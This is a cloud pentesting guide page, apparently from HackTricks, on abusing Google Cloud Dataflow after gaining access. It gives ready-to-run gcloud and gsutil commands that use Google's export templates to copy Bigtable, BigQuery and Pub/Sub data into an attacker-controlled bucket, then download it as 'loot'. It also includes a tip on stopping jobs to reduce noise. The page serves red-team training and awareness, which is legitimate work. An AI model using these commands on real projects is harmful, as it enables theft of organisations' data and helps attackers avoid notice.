GCP - Dataflow Post Exploitation
Tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Dataflow
For more information about Dataflow check:
Using Dataflow to exfiltrate data from other services
Permissions: dataflow.jobs.create, resourcemanager.projects.get, iam.serviceAccounts.actAs (over a SA with access to source and sink)
With Dataflow job creation rights, you can use GCP Dataflow templates to export data from Bigtable, BigQuery, Pub/Sub, and other services into attacker-controlled GCS buckets. This is a powerful post-exploitation technique when you have obtained Dataflow access—for example via the Dataflow Rider privilege escalation (pipeline takeover via bucket write).
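Google publishes its ready-made templates in public regional buckets, so you can enumerate the available exfiltration-friendly templates before launching anything. A minimal sketch, assuming the public `gs://dataflow-templates-<region>` bucket layout with `latest` as a version alias:

```shell
# List the classic templates Google publishes for a region and filter for
# ones that read from interesting sources (Bigtable, BigQuery, Pub/Sub).
# gs://dataflow-templates-us-central1 is Google's public template bucket.
gsutil ls gs://dataflow-templates-us-central1/latest/ \
  | grep -Ei 'bigtable|bigquery|pubsub'
```

This listing requires no special permissions in the victim project since the template bucket is publicly readable.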
Note
You need iam.serviceAccounts.actAs over a service account with sufficient permissions to read the source and write to the sink. If no service account is specified, the Compute Engine default SA is used.
Bigtable to GCS
See GCP - Bigtable Post Exploitation — “Dump rows to your bucket” for the full pattern. Templates: Cloud_Bigtable_to_GCS_Json, Cloud_Bigtable_to_GCS_Parquet, Cloud_Bigtable_to_GCS_SequenceFile.
Export Bigtable to attacker-controlled bucket
gcloud dataflow jobs run <job-name> \
--gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
--project=<PROJECT> \
--region=<REGION> \
--parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<YOUR_BUCKET>/raw-json/ \
--staging-location=gs://<YOUR_BUCKET>/staging/
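Once the job is launched you can track it until it finishes and then pull the exported files from the bucket you control. A sketch using standard gcloud/gsutil commands (placeholders as above):

```shell
# Watch the job until it leaves the active state (JOB_STATE_DONE on success)
gcloud dataflow jobs list --project=<PROJECT> --region=<REGION> --status=active
gcloud dataflow jobs describe <JOB_ID> --project=<PROJECT> --region=<REGION>

# Download the exfiltrated rows from the attacker-controlled bucket
gsutil -m cp -r gs://<YOUR_BUCKET>/raw-json/ ./loot/
```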
BigQuery to GCS
Dataflow templates exist to export BigQuery data. Use the appropriate template for your target format (JSON, Avro, etc.) and point the output to your bucket.
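As a sketch, the Google-provided BigQuery_to_Parquet flex template can dump a table into your bucket. The template path and parameter names (`tableRef`, `bucket`) are assumptions based on the public template bucket layout; verify them against the template metadata before launching:

```shell
# Launch a flex-template job that reads the target table via the BigQuery
# Storage API and writes Parquet files to the attacker-controlled bucket.
gcloud dataflow flex-template run "bq-export-$(date +%s)" \
  --project=<PROJECT> \
  --region=<REGION> \
  --template-file-gcs-location=gs://dataflow-templates-<REGION>/latest/flex/BigQuery_to_Parquet \
  --parameters=tableRef=<PROJECT>:<DATASET>.<TABLE>,bucket=gs://<YOUR_BUCKET>/bq-export
```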
Pub/Sub and streaming sources
Streaming pipelines can read from Pub/Sub (or other sources) and write to GCS. Launch a job with a template that reads from the target Pub/Sub subscription and writes to your controlled bucket.
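One hedged example using the Google-provided Cloud_PubSub_to_GCS_Text classic template, which windows messages from a topic into text files (parameter names assumed from the public template; check its metadata in the template bucket):

```shell
# Streaming job: subscribe to the target topic and continuously write
# message batches as text files into the attacker-controlled bucket.
gcloud dataflow jobs run "ps-export-$(date +%s)" \
  --gcs-location=gs://dataflow-templates-<REGION>/latest/Cloud_PubSub_to_GCS_Text \
  --project=<PROJECT> \
  --region=<REGION> \
  --staging-location=gs://<YOUR_BUCKET>/staging/ \
  --parameters=inputTopic=projects/<PROJECT>/topics/<TOPIC>,outputDirectory=gs://<YOUR_BUCKET>/pubsub/,outputFilenamePrefix=msgs-
```

Note this is a streaming job: it keeps running (and billing) until you cancel or drain it, so collect the output and stop the job to limit noise.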